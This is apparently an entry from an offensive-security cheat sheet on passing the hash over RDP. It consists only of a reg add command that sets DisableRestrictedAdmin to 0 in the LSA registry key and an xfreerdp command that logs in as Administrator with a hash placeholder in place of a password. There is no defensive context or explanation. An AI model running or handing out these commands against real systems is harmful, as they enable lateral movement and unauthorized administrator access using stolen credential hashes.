Pass-the-Hash over RDP (DisableRestrictedAdmin Bypass)

HKLM\SYSTEM\CurrentControlSet\Control\Lsa Value: DisableRestrictedAdmin Type: REG_DWORD Data: 0

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v DisableRestrictedAdmin /t REG_DWORD /d 0 /f

xfreerdp /v:IP /u:Administrator /pth:HASH /cert:ignore